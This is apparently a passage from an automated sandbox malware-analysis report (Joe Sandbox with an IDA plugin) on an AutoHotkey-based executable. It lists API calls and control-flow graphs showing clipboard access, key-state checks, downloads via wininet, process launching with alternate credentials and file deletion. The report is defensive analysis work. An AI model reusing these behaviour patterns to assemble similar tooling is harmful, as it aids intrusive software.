      • Part of subcall function 00466F60: SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 00466FB2
      • Part of subcall function 00466F60: SendMessageA.USER32(?,0000130C,-00000001,00000000), ref: 00466FF6
      • Part of subcall function 00466F60: GetDlgCtrlID.USER32 ref: 00467012
      • Part of subcall function 00466F60: PostMessageA.USER32(?,00000414,?,00000000), ref: 0046708A
    • GetKeyState.USER32(00000011), ref: 004019C0
    • GetKeyState.USER32(000000A5), ref: 004019D5
      • Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012BC
      • Part of subcall function 004012B0: GetParent.USER32(00000000), ref: 004012C7
      • Part of subcall function 004012B0: GetDlgCtrlID.USER32(00000000), ref: 004012D4
    • SendMessageA.USER32(?,000000C2,00000001,0049881C), ref: 00401A1F
    • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00401A3C
      • Part of subcall function 00463460: PostMessageA.USER32(?,00000414,2AF80007,00000000), ref: 00463476
    • SendMessageA.USER32(00000000,00001116,00000000,00000000), ref: 00401A79
    • SendMessageA.USER32(00000000,00001116,00000001,00000000), ref: 00401A93
    • IsDialogMessage.USER32(?,?), ref: 00401AE3
      • Part of subcall function 00415A90: MessageBoxA.USER32(000601DA,?,001B2734,00010000), ref: 00415AF2
      • Part of subcall function 00415A90: IsWindow.USER32(000601DA), ref: 00415AFE
      • Part of subcall function 00415A90: DestroyWindow.USER32(000601DA), ref: 00415B16
      • Part of subcall function 00415A90: _strncpy.LIBCMT ref: 00415B90
      • Part of subcall function 00415A90: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,00000000,004A8ED0,001BC918,00000000), ref: 00415BE9
    • KillTimer.USER32(000601DA,00000009), ref: 00401C52
    • GetForegroundWindow.USER32 ref: 00401CEB
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00401CFE
    • GetClassNameA.USER32(00000000,?,00000020), ref: 00401D1B
    • IsDialogMessage.USER32(00000000,?), ref: 00401D5A
    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 00401D76
    • DragQueryFile.SHELL32(?,000000FF,00000000,00000000), ref: 00401EA8
    • DragFinish.SHELL32(?), ref: 00401EC3
      • Part of subcall function 00463400: ShowWindow.USER32(?,00000000), ref: 0046340A
      • Part of subcall function 00409680: SendMessageTimeoutA.USER32(000601DA,00000419,?,?,00000003,000003E8,?), ref: 0040970D
      • Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6EA
      • Part of subcall function 0040C660: CharUpperA.USER32(?), ref: 0040C6FB
      • Part of subcall function 0040C660: Sleep.KERNEL32(00000000), ref: 0040C7AB
    • GetTickCount.KERNEL32 ref: 00402122
    • DragFinish.SHELL32(00000000), ref: 004021C9
    • DragFinish.SHELL32(00000000), ref: 004021FA
    • GetTickCount.KERNEL32 ref: 0040225B
    • GetTickCount.KERNEL32 ref: 00402275
    • _strncpy.LIBCMT ref: 00402293
    • _strncpy.LIBCMT ref: 004022B2
    • _strncpy.LIBCMT ref: 00402317
      • Part of subcall function 004034E0: SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop,?,001B3348,0040333F), ref: 00403545
      • Part of subcall function 004034E0: GetTickCount.KERNEL32(?,001B3348,0040333F), ref: 004035B7
    • GetTickCount.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402343
      • Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A417
      • Part of subcall function 0040A3F0: GetTickCount.KERNEL32(00000000,?,?,001BC918), ref: 0040A42D
      • Part of subcall function 0040A3F0: GetTickCount.KERNEL32 ref: 0040A53A
      • Part of subcall function 0040A3F0: PostMessageA.USER32(000601DA,00000312,?,00000000), ref: 0040A55B
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00402EC0: GetTickCount.KERNEL32(00402D03,?,?,?,?,?,?), ref: 00402EC0
    • TranslateAccelerator.USER32(000601DA,0024027F,?), ref: 00402D3F
    • TranslateMessage.USER32(?), ref: 00402D68
    • DispatchMessageA.USER32(?), ref: 00402D73
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • CloseHandle.KERNEL32(?), ref: 0042E5D0
      • Part of subcall function 0044EF00: LoadLibraryA.KERNEL32(advapi32), ref: 0044EF17
      • Part of subcall function 0044EF00: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW,?,?,?,?,0042E58B,?,?,?,?,00000000,00000000,?,?), ref: 0044EF52
      • Part of subcall function 0044EF00: FreeLibrary.KERNEL32(00000000,?,?,?,?,0042E58B,?,?,?,?,00000000,00000000,?,?), ref: 0044EF61
      • Part of subcall function 0044EF00: MultiByteToWideChar.KERNEL32 ref: 0044EFDF
      • Part of subcall function 0044EF00: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0044EFFB
      • Part of subcall function 0044EF00: CloseHandle.KERNEL32(?), ref: 0044F09A
      • Part of subcall function 0044EF00: GetLastError.KERNEL32 ref: 0044F0C1
      • Part of subcall function 0044EF00: FreeLibrary.KERNEL32(00000000), ref: 0044F0D1
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 0042E5BE
    • CloseHandle.KERNEL32(?), ref: 0042E611
    • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000044,00000000), ref: 0042E62B
    • SetCurrentDirectoryA.KERNEL32(?), ref: 0042E713
    • GetFileAttributesA.KERNEL32 ref: 0042E775
    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\Desktop), ref: 0042E7A8
    • ShellExecuteEx.SHELL32(0000003C), ref: 0042E7BE
    • GetModuleHandleA.KERNEL32(kernel32.dll,GetProcessId), ref: 0042E7E2
    • GetProcAddress.KERNEL32(00000000), ref: 0042E7E9
    • GetLastError.KERNEL32 ref: 0042E829
    • FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,000001FF,00000000), ref: 0042E862
      • Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 804 450930-450949 LoadLibraryA 805 450980-4509cb GetProcAddress * 5 804->805 806 45094b-450957 804->806 807 4509d1-4509d3 805->807 808 450cc1-450cd5 FreeLibrary 805->808 809 45095d-45097d call 474680 806->809 810 450cfa-450d1c call 42d230 806->810 807->808 812 4509d9-4509db 807->812 808->810 813 450cd7-450cf7 call 474680 808->813 812->808 816 4509e1-4509e6 812->816 816->808 820 4509ec-4509ee 816->820 820->808 821 4509f4-4509fb 820->821 822 450a03-450a07 821->822 823 450a0d-450a0e 822->823 824 450a09-450a0b 822->824 823->822 824->823 825 450a10-450a13 824->825 826 450a3e-450a57 825->826 827 450a15-450a2d call 412b00 call 409340 825->827 832 450a7a-450a8f 826->832 833 450a59-450a77 FreeLibrary call 42fa00 826->833 827->826 836 450a2f 827->836 840 450ab7-450ad0 call 487231 832->840 841 450a91 832->841 839 450a31-450a35 836->839 842 450a3b-450a3c 839->842 843 450a37-450a39 839->843 848 450ae2-450b24 840->848 849 450ad2-450ae0 840->849 845 450a96-450ab4 FreeLibrary call 42fa00 841->845 842->839 843->826 843->842 851 450bd3-450be5 848->851 852 450b2a-450b2c 848->852 849->845 857 450c6e-450c84 FreeLibrary call 487486 851->857 858 450beb 851->858 852->851 854 450b32-450b48 852->854 854->857 860 450b4e-450b53 854->860 881 450c89-450c8e 857->881 861 450bf0-450bf5 858->861 860->857 862 450b59-450b73 GetTickCount 860->862 861->857 864 450bf7-450c11 GetTickCount 861->864 867 450b9f-450bcc call 48739f 862->867 868 450b75-450b8a PeekMessageA 862->868 865 450c13-450c28 PeekMessageA 864->865 866 450c3d-450c6c call 48739f 864->866 872 450c36-450c38 GetTickCount 865->872 873 450c2a-450c33 call 401330 865->873 866->857 866->861 867->860 889 450bce 867->889 870 450b8c-450b95 call 401330 868->870 871 450b98-450b9a GetTickCount 868->871 870->871 871->867 872->866 873->872 884 450c90-450c9e DeleteFileA 881->884 885 450ca0-450cbe call 42d320 881->885 884->885 889->857
    APIs
    • LoadLibraryA.KERNEL32(wininet), ref: 0045093F
    • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 0045098C
    • GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 00450998
    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 004509A6
    • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 004509B4
    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 004509C0
    • FreeLibrary.KERNEL32(00000000), ref: 00450A5A
    • FreeLibrary.KERNEL32(00000000), ref: 00450A97
    • GetTickCount.KERNEL32 ref: 00450B5F
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00450B82
    • GetTickCount.KERNEL32 ref: 00450B98
    • GetTickCount.KERNEL32 ref: 00450BFD
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00450C20
    • GetTickCount.KERNEL32 ref: 00450C36
    • FreeLibrary.KERNEL32(00000000), ref: 00450C7D
    • DeleteFileA.KERNEL32(?), ref: 00450C98
    • FreeLibrary.KERNEL32(00000000), ref: 00450CC2
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 891 403af0-403b29 RtlInitializeCriticalSection SetErrorMode GetCurrentDirectoryA 892 403bf6-403bfd 891->892 893 403b2f 891->893 894 403b34 892->894 895 403c03-403c0b 892->895 893->894 896 403b39-403b58 894->896 897 403c10-403c15 895->897 898 403b5e 896->898 899 403ce4-403d03 call 420b20 896->899 897->897 900 403c17-403c27 call 46ee70 897->900 902 403b60-403b6e 898->902 909 403d05-403d28 call 420db0 899->909 910 403d2a-403d2e 899->910 911 403c42-403c44 900->911 912 403c29-403c3d call 42d7a0 900->912 904 403b74-403b92 call 484cd8 902->904 905 403c5e-403c6e call 4847a1 902->905 927 403d35-403d40 904->927 928 403b98-403bb6 call 420b20 904->928 924 403c70-403c80 call 4847a1 905->924 925 403cd2 905->925 909->910 909->927 918 403d43 910->918 919 403d30-403d33 910->919 920 403c46-403c52 call 48d0a0 911->920 921 403c55-403c59 911->921 912->896 923 403d45-403d4a 918->923 919->923 920->921 921->896 930 403d5b-403d70 923->930 931 403d4c-403d58 923->931 924->925 941 403c82-403c92 call 4847a1 924->941 933 403cd7-403cde 925->933 944 403be0-403bf1 call 474680 928->944 945 403bb8-403bda call 420db0 928->945 936 403d72-403d7d call 401150 930->936 937 403d7f-403d86 930->937 931->930 933->899 933->902 951 403da4-403dbc call 403980 call 414f80 936->951 942 403d8c-403d93 937->942 943 403d88-403d8a 937->943 960 403cc9-403cd0 941->960 961 403c94-403ca4 call 4847a1 941->961 950 403d95-403d97 942->950 942->951 943->942 949 403d99-403d9b 943->949 944->933 945->927 945->944 949->951 957 403d9d-403d9f call 401150 949->957 950->949 950->951 951->927 966 403dc2-403de1 call 415e50 951->966 957->951 960->933 961->960 967 403ca6-403cb6 call 4847a1 961->967 966->927 974 403de7-403de9 966->974 972 403cb8-403cbf 967->972 973 403cc1-403cc7 967->973 972->933 973->933 975 40406e-404076 974->975 976 403def-403df6 974->976 977 403df8-403e01 976->977 978 403e37-403e3a 976->978 981 403e03-403e0a 977->981 982 403e2b-403e35 977->982 979 403eab-403ead 978->979 980 403e3c-403e3e 978->980 984 403eb3-403ec8 FindWindowA 979->984 986 403f31-403f49 SystemParametersInfoA 979->986 983 403e40-403e46 980->983 980->984 981->982 985 403e0c-403e13 981->985 982->980 983->986 987 403e4c-403e62 FindWindowA 983->987 984->986 990 403eca 984->990 985->982 991 403e15-403e1c 985->991 988 403f61-403f6e call 415240 986->988 989 403f4b-403f52 986->989 987->986 992 403e68-403e70 987->992 988->927 1003 403f74-403f93 call 484e67 call 484d71 988->1003 989->988 993 403f54-403f5f SystemParametersInfoA 989->993 995 403ecf-403ef0 PostMessageA Sleep IsWindow 990->995 991->982 996 403e1e-403e25 991->996 992->975 997 403e76-403e79 992->997 993->988 999 403f2d-403f2f Sleep 995->999 1000 403ef2-403ef5 995->1000 996->979 996->982 1001 403ea4-403ea9 997->1001 1002 403e7b-403e9e call 476270 997->1002 999->986 1004 403ef7-403f15 call 476270 1000->1004 1005 403f1d-403f2b Sleep IsWindow 1000->1005 1001->995 1002->975 1002->1001 1015 403f95-403fa8 call 484959 1003->1015 1016 403fb6-403fbd 1003->1016 1004->927 1012 403f1b 1004->1012 1005->999 1005->1000 1012->1005 1015->1016 1022 403faa-403fb3 call 48dc70 1015->1022 1018 403fbf-403fcc 1016->1018 1019 403fda-404005 call 409950 call 420b20 1016->1019 1018->1019 1028 40402c-404030 1019->1028 1029 404007-40402a call 420db0 1019->1029 1022->1016 1030 404032-404035 1028->1030 1031 404037 1028->1031 1029->1028 1036 404050-404055 call 415820 1029->1036 1033 404039-40403d 1030->1033 1031->1033 1035 40403f-40404d call 401150 1033->1035 1033->1036 1035->1036 1040 40405a-40405c 1036->1040 1040->927 1041 404062-40406b call 401330 1040->1041 1041->975
    APIs
    • RtlInitializeCriticalSection.NTDLL(004A90F0), ref: 00403B09
    • SetErrorMode.KERNELBASE(00000001), ref: 00403B11
    • GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 00403B21
      • Part of subcall function 00420B20: _strncpy.LIBCMT ref: 00420B87
      • Part of subcall function 00414F80: GetModuleFileNameA.KERNEL32(00000000,00000800,00000800,?,00000000,?,00000000), ref: 00414FA3
      • Part of subcall function 00414F80: GetModuleFileNameA.KERNEL32(00000000,?,000007FE), ref: 004151B4
      • Part of subcall function 00415E50: SetCurrentDirectoryA.KERNEL32(001B26F8,004AC280,004AC280,00000068,00000000,00000000,00000000,004AC280), ref: 00415FBD
      • Part of subcall function 00415E50: GetSystemTimeAsFileTime.KERNEL32(004A8ED0,00000000,00498874,000000FF,00000000,00000001,ErrorLevel,00000000,00000003,004AC280,?,00000000,00000000,00000000,00000000,004AC280), ref: 00416042
    • FindWindowA.USER32(AutoHotkey,001B277C), ref: 00403E58
    • FindWindowA.USER32(AutoHotkey,001B277C), ref: 00403EBE
    • PostMessageA.USER32(00000000,00000044,00000406,00000000), ref: 00403ED5
    • Sleep.KERNEL32(00000014), ref: 00403EE5
    • IsWindow.USER32(00000000), ref: 00403EE8
    • Sleep.KERNEL32(00000014), ref: 00403F20
    • IsWindow.USER32(00000000), ref: 00403F23
    • Sleep.KERNEL32(00000064), ref: 00403F2F
    • SystemParametersInfoA.USER32(00002000,00000000,004A8DE4,00000000), ref: 00403F45
      • Part of subcall function 00415240: GetSystemMetrics.USER32(00000031), ref: 004152B0
      • Part of subcall function 00415240: LoadCursorA.USER32(00000000,00007F00), ref: 004152E0
      • Part of subcall function 00415240: RegisterClassExA.USER32 ref: 00415305
      • Part of subcall function 00415240: RegisterClassExA.USER32(?), ref: 0041534A
      • Part of subcall function 00415240: GetForegroundWindow.USER32 ref: 00415351
      • Part of subcall function 00415240: GetClassNameA.USER32(00000000,?,00000040), ref: 00415363
      • Part of subcall function 00415240: CreateWindowExA.USER32(00000001,AutoHotkey,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00400000,00000000), ref: 004153D6
      • Part of subcall function 00415240: GetMenu.USER32(00000000), ref: 0041540B
      • Part of subcall function 00415240: EnableMenuItem.USER32(00000000,0000FF79,00000003), ref: 0041541B
      • Part of subcall function 00415240: CreateWindowExA.USER32(00000000,edit,00000000,50A00804,00000000,00000000,00000000,00000000,000601DA,00000001,00400000,00000000), ref: 00415453
      • Part of subcall function 00415240: GetDC.USER32(00000000), ref: 0041545F
      • Part of subcall function 00415240: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00415499
      • Part of subcall function 00415240: MulDiv.KERNEL32(0000000A,00000000), ref: 004154A2
      • Part of subcall function 00415240: CreateFontA.GDI32(00000000), ref: 004154AB
      • Part of subcall function 00415240: ReleaseDC.USER32(000801CA,00000000), ref: 004154BD
      • Part of subcall function 00415240: SendMessageA.USER32(000801CA,00000030,3C0A0928,00000000), ref: 004154DB
      • Part of subcall function 00415240: SendMessageA.USER32(000801CA,000000C5,00000000,00000000), ref: 004154EC
      • Part of subcall function 00415240: ShowWindow.USER32(000601DA,00000000), ref: 004154FD
      • Part of subcall function 00415240: ShowWindow.USER32(000601DA,00000000), ref: 00415508
      • Part of subcall function 00415240: ShowWindow.USER32(000601DA,00000006), ref: 00415519
      • Part of subcall function 00415240: SetWindowLongA.USER32(000601DA,000000EC,00000000), ref: 00415526
      • Part of subcall function 00415240: LoadAcceleratorsA.USER32(00400000,000000D4), ref: 00415538
      • Part of subcall function 00484D71: __freebuf.LIBCMT ref: 00484DEB
    • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000002), ref: 00403F5F
      • Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
      • Part of subcall function 00409950: UnregisterHotKey.USER32(000601DA,004ABB00), ref: 004099F1
      • Part of subcall function 00409950: RegisterHotKey.USER32(000601DA,?,?,?), ref: 00409C59
      • Part of subcall function 00409950: UnregisterHotKey.USER32(000601DA,004ABB00), ref: 00409C81
      • Part of subcall function 00409950: SetTimer.USER32(000601DA,00000009,0000000A,00000000), ref: 00409D3D
      • Part of subcall function 00420DB0: _strncpy.LIBCMT ref: 00420E09
      • Part of subcall function 00415820: SetTimer.USER32(000601DA,0000000E,04EF6D80,00403830), ref: 00415880
      • Part of subcall function 00415820: GetTickCount.KERNEL32 ref: 004158A6
      • Part of subcall function 00415820: SetTimer.USER32(000601DA,0000000B,00000064,00403730), ref: 004158D5
      • Part of subcall function 00415820: GetTickCount.KERNEL32 ref: 004158E9
      • Part of subcall function 00415820: KillTimer.USER32(000601DA,0000000B), ref: 00415928
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetEnvironmentVariableA.KERNEL32(?,?,00000000), ref: 00456828
      • Part of subcall function 00420B20: _strncpy.LIBCMT ref: 00420B87
      • Part of subcall function 00420DB0: _strncpy.LIBCMT ref: 00420E09
    • GetEnvironmentVariableA.KERNEL32(?,?,00000000), ref: 00456AA5
      • Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(00000001), ref: 00404096
      • Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040409C
      • Part of subcall function 00404080: GlobalUnWire.KERNEL32(00000000), ref: 0040410F
      • Part of subcall function 00404080: CloseClipboard.USER32 ref: 0040411B
      • Part of subcall function 00404080: GlobalFix.KERNEL32(00000000), ref: 00404136
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404194
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,00000000), ref: 004041BA
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404207
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,000003E7), ref: 0040422D
      • Part of subcall function 00474A50: GetEnvironmentVariableA.KERNEL32(?,?,00000000), ref: 00474AA3
    • __alldiv.INT64 ref: 004576CF
    • lstrcmpi.KERNEL32(?,00000000), ref: 00457B05
    • lstrcmpi.KERNEL32(?,00000000), ref: 00457B74
    • lstrcmpi.KERNEL32(?,00000000), ref: 00457BD1
    • lstrcmpi.KERNEL32(?,00000000), ref: 00457C22
    • lstrcmpi.KERNEL32(?,00000000), ref: 00457C73
    • lstrcmpi.KERNEL32(?,00000000), ref: 00457CC4
      • Part of subcall function 00485EC9: __isxdigit_l.LIBCMT ref: 00485EF0
      • Part of subcall function 00401050: __i64tow.LIBCMT ref: 0040106C
      • Part of subcall function 00401050: __i64tow.LIBCMT ref: 004010A0
      • Part of subcall function 00401050: CharUpperA.USER32(004987E7), ref: 004010B7
      • Part of subcall function 004719A0: _vswprintf_s.LIBCMT ref: 004719B9
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • CloseClipboard.USER32 ref: 00423FC2
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
    • GetTickCount.KERNEL32(?,?), ref: 00424018
    • GetTickCount.KERNEL32(?,?), ref: 004240D4
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 3461 4403a0-4403b9 3462 440409-440417 call 409340 3461->3462 3463 4403bb-4403cd 3461->3463 3471 440456-440465 call 4205b0 3462->3471 3472 440419-440448 SetLastError DeleteFileA GetLastError call 42d320 3462->3472 3464 4403cf-4403ea call 474680 3463->3464 3465 4403ed-440406 call 42d230 3463->3465 3478 440467-440479 3471->3478 3479 44049e-4404b8 FindFirstFileA 3471->3479 3477 44044d-440453 3472->3477 3478->3465 3480 44047f-44049b call 474680 3478->3480 3481 4404ba-4404e2 GetLastError call 4010d0 3479->3481 3482 4404e5-4404ed 3479->3482 3485 4404f0-4404f8 3482->3485 3485->3485 3488 4404fa-44050b call 48699a 3485->3488 3491 440522-440526 3488->3491 3492 44050d-440514 3488->3492 3494 440528-440543 3491->3494 3493 440517-44051c 3492->3493 3493->3493 3495 44051e-440520 3493->3495 3496 440546-44055a GetTickCount 3494->3496 3495->3494 3497 440582-44058a 3496->3497 3498 44055c-44056d PeekMessageA 3496->3498 3501 4405ec-440601 FindNextFileA 3497->3501 3502 44058c-440593 3497->3502 3499 44056f-440578 call 401330 3498->3499 3500 44057b-44057d GetTickCount 3498->3500 3499->3500 3500->3497 3501->3496 3503 440607-440626 FindClose call 42d3e0 3501->3503 3505 440596-44059b 3502->3505 3505->3505 3508 44059d-4405a1 3505->3508 3509 4405b1-4405be 3508->3509 3510 4405a3-4405af 3508->3510 3513 4405c0-4405c8 3509->3513 3512 4405e8 3510->3512 3512->3501 3513->3513 3514 4405ca-4405d7 DeleteFileA 3513->3514 3514->3501 3515 4405d9-4405e5 GetLastError 3514->3515 3515->3512
    APIs
    • SetLastError.KERNEL32(00000000), ref: 0044041A
    • DeleteFileA.KERNELBASE(004987E9), ref: 00440421
    • GetLastError.KERNEL32 ref: 00440430
    • FindFirstFileA.KERNEL32(004987E9,?), ref: 004404AB
    • GetLastError.KERNEL32 ref: 004404BA
    • GetTickCount.KERNEL32 ref: 00440546
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00440565
    • GetTickCount.KERNEL32 ref: 0044057B
    • DeleteFileA.KERNEL32(?), ref: 004405CF
    • GetLastError.KERNEL32 ref: 004405D9
    • FindNextFileA.KERNEL32(?,00000010), ref: 004405F9
    • FindClose.KERNEL32(?), ref: 0044060C
      • Part of subcall function 0042D3E0: __itow.LIBCMT ref: 0042D40E
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
